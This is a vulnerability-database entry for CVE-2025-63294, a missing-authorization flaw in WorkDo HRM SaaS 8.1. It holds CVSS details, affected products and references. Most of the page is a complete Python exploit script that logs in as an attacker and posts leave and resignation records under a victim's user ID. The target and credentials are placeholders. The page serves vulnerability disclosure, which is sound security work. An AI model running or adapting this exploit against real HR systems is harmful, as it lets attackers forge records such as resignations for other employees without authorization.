Security Vulnerability Report
CVE-2025-63294 CVSS 6.5 MEDIUM

CVE-2025-63294

Published: 2025-11-04 16:16:01
Last Modified: 2026-02-04 20:15:05

Description

WorkDo HRM SaaS HR and Payroll Tool 8.1 is vulnerable to Insecure Permissions (missing authorization, CWE-862): an authenticated user can create leave or resignation records on behalf of other users.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Weakness: CWE-862 (Missing Authorization)

Configurations (Affected Products)

cpe:2.3:a:workdo:hrm_saas:8.1:*:*:*:*:*:*:* - VULNERABLE
WorkDo HRM SaaS HR and Payroll Tool 8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-63294 PoC - WorkDo HRM SaaS IDOR Vulnerability
This PoC demonstrates the IDOR vulnerability in WorkDo HRM SaaS HR and Payroll Tool 8.1
"""
import requests

TARGET_URL = "https://vulnerable-workdo-instance.com"
ATTACKER_USERNAME = "[email protected]"
ATTACKER_PASSWORD = "attacker_password"
VICTIM_USER_ID = "12345"  # ID of the victim user


def authenticate():
    """Authenticate as the attacker user"""
    session = requests.Session()
    login_data = {
        "email": ATTACKER_USERNAME,
        "password": ATTACKER_PASSWORD
    }
    response = session.post(f"{TARGET_URL}/api/auth/login", json=login_data)
    if response.status_code == 200:
        return session
    else:
        raise Exception("Authentication failed")


def create_leave_record_as_victim(session):
    """Create a leave record on behalf of the victim user"""
    # Original request would have attacker's user_id
    # We modify it to use the victim's user_id
    leave_data = {
        "user_id": VICTIM_USER_ID,  # IDOR: Using victim's ID
        "leave_type": "annual",
        "start_date": "2025-12-01",
        "end_date": "2025-12-05",
        "reason": "Vacation"
    }
    headers = {
        "Content-Type": "application/json",
        "X-CSRF-Token": session.cookies.get("csrf_token")
    }
    response = session.post(
        f"{TARGET_URL}/api/leave/create",
        json=leave_data,
        headers=headers
    )
    return response


def create_resignation_record_as_victim(session):
    """Create a resignation record on behalf of the victim user"""
    resignation_data = {
        "user_id": VICTIM_USER_ID,  # IDOR: Using victim's ID
        "resignation_date": "2025-12-31",
        "reason": "Personal reasons"
    }
    headers = {
        "Content-Type": "application/json",
        "X-CSRF-Token": session.cookies.get("csrf_token")
    }
    response = session.post(
        f"{TARGET_URL}/api/resignation/create",
        json=resignation_data,
        headers=headers
    )
    return response


def main():
    print("[*] CVE-2025-63294 PoC - WorkDo HRM IDOR Vulnerability")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Victim User ID: {VICTIM_USER_ID}")
    try:
        # Step 1: Authenticate as attacker
        print("\n[1] Authenticating as attacker...")
        session = authenticate()
        print("[+] Authentication successful")

        # Step 2: Create leave record as victim
        print("\n[2] Creating leave record on behalf of victim...")
        response = create_leave_record_as_victim(session)
        if response.status_code in [200, 201]:
            print("[+] Leave record created successfully as victim")
            print(f"    Response: {response.json()}")
        else:
            print(f"[-] Failed to create leave record: {response.status_code}")

        # Step 3: Create resignation record as victim
        print("\n[3] Creating resignation record on behalf of victim...")
        response = create_resignation_record_as_victim(session)
        if response.status_code in [200, 201]:
            print("[+] Resignation record created successfully as victim")
            print(f"    Response: {response.json()}")
        else:
            print(f"[-] Failed to create resignation record: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {str(e)}")


if __name__ == "__main__":
    main()
```

References

https://codecanyon.net/item/hrm-saas-hr-and-payroll-tool/25982934 (Product)
https://medium.com/@barrattjack89/cve-2025-63294-insecure-permissions-in-workdo-hrm-saas-hr-and-payroll-8-1-d6bb03c21177 (Exploit, Third Party Advisory)
https://workdo.io/hrm-saas-human-resource-management-software/ (Product)
